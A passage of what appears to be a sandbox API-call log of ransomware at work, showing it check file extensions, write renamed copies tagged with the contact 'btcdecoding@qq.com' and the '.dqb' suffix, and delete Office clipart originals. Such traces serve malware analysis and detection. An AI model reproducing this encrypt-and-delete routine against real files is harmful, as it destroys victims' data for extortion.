4 [0055.391] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0055.391] lstrlenW (lpString=".jpg") returned 4 [0055.391] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.526] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.526] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0055.526] GetLastError () returned 0x0 [0055.526] ReadFile (in: hFile=0x200, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x9fc, lpOverlapped=0x0) returned 1 [0055.539] WriteFile (in: hFile=0x234, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xa00, lpOverlapped=0x0) returned 1 [0055.540] ReadFile (in: hFile=0x200, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.540] WriteFile (in: hFile=0x234, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.540] SetEndOfFile (hFile=0x234) returned 1 [0055.541] CloseHandle (hObject=0x234) returned 1 [0055.541] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.541] SetEndOfFile (hFile=0x200) returned 1 [0055.542] CloseHandle (hObject=0x200) returned 1 [0055.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.542] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf")) returned 1 [0055.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0055.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0055.542] lstrlenW (lpString=".doc") returned 4 [0055.542] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.542] lstrlenW (lpString=".docx") returned 5 [0055.542] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.542] lstrlenW (lpString=".pdf") returned 4 [0055.542] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.542] lstrlenW (lpString=".xls") returned 4 [0055.542] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.542] lstrlenW (lpString=".xlsx") returned 5 [0055.542] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.542] lstrlenW (lpString=".ppt") returned 4 [0055.542] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0055.543] lstrlenW (lpString=".zip") returned 4 [0055.543] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.543] lstrlenW (lpString=".rar") returned 4 [0055.543] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.543] lstrlenW (lpString=".bz2") returned 4 [0055.543] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.543] lstrlenW (lpString=".7z") returned 3 [0055.543] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0055.543] lstrlenW (lpString=".dbf") returned 4 [0055.543] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0055.543] lstrlenW (lpString=".1cd") returned 4 [0055.543] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 63 [0055.543] lstrlenW (lpString=".jpg") returned 4 [0055.543] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.543] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.543] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0055.544] GetLastError () returned 0x0 [0055.544] ReadFile (in: hFile=0x200, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x2cec, lpOverlapped=0x0) returned 1 [0055.555] WriteFile (in: hFile=0x234, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x2cf0, lpOverlapped=0x0) returned 1 [0055.557] ReadFile (in: hFile=0x200, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.557] WriteFile (in: hFile=0x234, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.557] SetEndOfFile (hFile=0x234) returned 1 [0055.571] CloseHandle (hObject=0x234) returned 1 [0055.583] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.583] SetEndOfFile (hFile=0x200) returned 1 [0055.603] CloseHandle (hObject=0x200) returned 1 [0055.612] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.612] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf")) returned 1 [0055.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0055.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0055.612] lstrlenW (lpString=".doc") returned 4 [0055.612] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.612] lstrlenW (lpString=".docx") returned 5 [0055.612] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.612] lstrlenW (lpString=".pdf") returned 4 [0055.612] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.612] lstrlenW (lpString=".xls") returned 4 [0055.612] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.612] lstrlenW (lpString=".xlsx") returned 5 [0055.612] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.612] lstrlenW (lpString=".ppt") returned 4 [0055.612] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0055.612] lstrlenW (lpString=".zip") returned 4 [0055.613] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.613] lstrlenW (lpString=".rar") returned 4 [0055.613] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.613] lstrlenW (lpString=".bz2") returned 4 [0055.613] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.613] lstrlenW (lpString=".7z") returned 3 [0055.613] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0055.613] lstrlenW (lpString=".dbf") returned 4 [0055.613] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0055.613] lstrlenW (lpString=".1cd") returned 4 [0055.613] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0055.613] lstrlenW (lpString=".jpg") returned 4 [0055.613] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.613] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.613] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0055.614] GetLastError () returned 0x0 [0055.614] ReadFile (in: hFile=0x200, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x94a, lpOverlapped=0x0) returned 1 [0055.618] WriteFile (in: hFile=0x234, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x950, lpOverlapped=0x0) returned 1 [0055.619] ReadFile (in: hFile=0x200, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.619] WriteFile (in: hFile=0x234, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.619] SetEndOfFile (hFile=0x234) returned 1 [0055.619] CloseHandle (hObject=0x234) returned 1 [0055.619] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.619] SetEndOfFile (hFile=0x200) returned 1 [0055.620] CloseHandle (hObject=0x200) returned 1 [0055.620] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.620] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf")) returned 1 [0055.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0055.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0055.621] lstrlenW (lpString=".doc") returned 4 [0055.621] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.621] lstrlenW (lpString=".docx") returned 5 [0055.621] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.621] lstrlenW (lpString=".pdf") returned 4 [0055.621] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.621] lstrlenW (lpString=".xls") returned 4 [0055.621] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.621] lstrlenW (lpString=".xlsx") returned 5 [0055.621] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.621] lstrlenW (lpString=".ppt") returned 4 [0055.621] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0055.621] lstrlenW (lpString=".zip") returned 4 [0055.621] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.621] lstrlenW (lpString=".rar") returned 4 [0055.621] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.621] lstrlenW (lpString=".bz2") returned 4 [0055.621] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.621] lstrlenW (lpString=".7z") returned 3 [0055.621] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0055.621] lstrlenW (lpString=".dbf") returned 4 [0055.621] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0055.714] lstrlenW (lpString=".1cd") returned 4 [0055.714] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0055.714] lstrlenW (lpString=".jpg") returned 4 [0055.714] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.761] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.761] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0056.762] GetLastError () returned 0x0 [0056.762] ReadFile (in: hFile=0x220, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x15cc, lpOverlapped=0x0) returned 1 [0056.763] WriteFile (in: hFile=0x164, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x15d0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x15d0, lpOverlapped=0x0) returned 1 [0056.764] ReadFile (in: hFile=0x220, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.764] WriteFile (in: hFile=0x164, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.764] SetEndOfFile (hFile=0x164) returned 1 [0056.764] CloseHandle (hObject=0x164) returned 1 [0056.765] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.765] SetEndOfFile (hFile=0x220) returned 1 [0056.766] CloseHandle (hObject=0x220) returned 1 [0056.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.766] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf")) returned 1 [0056.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0056.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0056.766] lstrlenW (lpString=".doc") returned 4 [0056.766] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.766] lstrlenW (lpString=".docx") returned 5 [0056.766] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.766] lstrlenW (lpString=".pdf") returned 4 [0056.766] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.766] lstrlenW (lpString=".xls") returned 4 [0056.766] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.767] lstrlenW (lpString=".xlsx") returned 5 [0056.767] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.767] lstrlenW (lpString=".ppt") returned 4 [0056.767] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0056.767] lstrlenW (lpString=".zip") returned 4 [0056.767] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.767] lstrlenW (lpString=".rar") returned 4 [0056.767] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.767] lstrlenW (lpString=".bz2") returned 4 [0056.767] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.767] lstrlenW (lpString=".7z") returned 3 [0056.767] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0056.767] lstrlenW (lpString=".dbf") returned 4 [0056.767] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0056.767] lstrlenW (lpString=".1cd") returned 4 [0056.767] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0056.767] lstrlenW (lpString=".jpg") returned 4 [0056.767] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.768] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.768] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0056.769] GetLastError () returned 0x0 [0056.769] ReadFile (in: hFile=0x220, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x68c, lpOverlapped=0x0) returned 1 [0056.770] WriteFile (in: hFile=0x164, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x690, lpOverlapped=0x0) returned 1 [0056.771] ReadFile (in: hFile=0x220, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.771] WriteFile (in: hFile=0x164, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.771] SetEndOfFile (hFile=0x164) returned 1 [0056.771] CloseHandle (hObject=0x164) returned 1 [0056.771] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.771] SetEndOfFile (hFile=0x220) returned 1 [0056.772] CloseHandle (hObject=0x220) returned 1 [0056.772] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.772] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf")) returned 1 [0056.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0056.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0056.773] lstrlenW (lpString=".doc") returned 4 [0056.773] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.773] lstrlenW (lpString=".docx") returned 5 [0056.773] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.773] lstrlenW (lpString=".pdf") returned 4 [0056.773] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.773] lstrlenW (lpString=".xls") returned 4 [0056.773] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.773] lstrlenW (lpString=".xlsx") returned 5 [0056.773] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.773] lstrlenW (lpString=".ppt") returned 4 [0056.773] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0056.773] lstrlenW (lpString=".zip") returned 4 [0056.773] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.773] lstrlenW (lpString=".rar") returned 4 [0056.773] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.773] lstrlenW (lpString=".bz2") returned 4 [0056.773] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.773] lstrlenW (lpString=".7z") returned 3 [0056.773] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0056.773] lstrlenW (lpString=".dbf") returned 4 [0056.773] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0056.773] lstrlenW (lpString=".1cd") returned 4 [0056.774] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0056.774] lstrlenW (lpString=".jpg") returned 4 [0056.774] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.774] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.774] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0056.775] GetLastError () returned 0x0 [0056.775] ReadFile (in: hFile=0x220, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xf38, lpOverlapped=0x0) returned 1 [0056.777] WriteFile (in: hFile=0x164, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xf40, lpOverlapped=0x0) returned 1 [0056.778] ReadFile (in: hFile=0x220, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.778] WriteFile (in: hFile=0x164, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.778] SetEndOfFile (hFile=0x164) returned 1 [0056.778] CloseHandle (hObject=0x164) returned 1 [0056.778] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.778] SetEndOfFile (hFile=0x220) returned 1 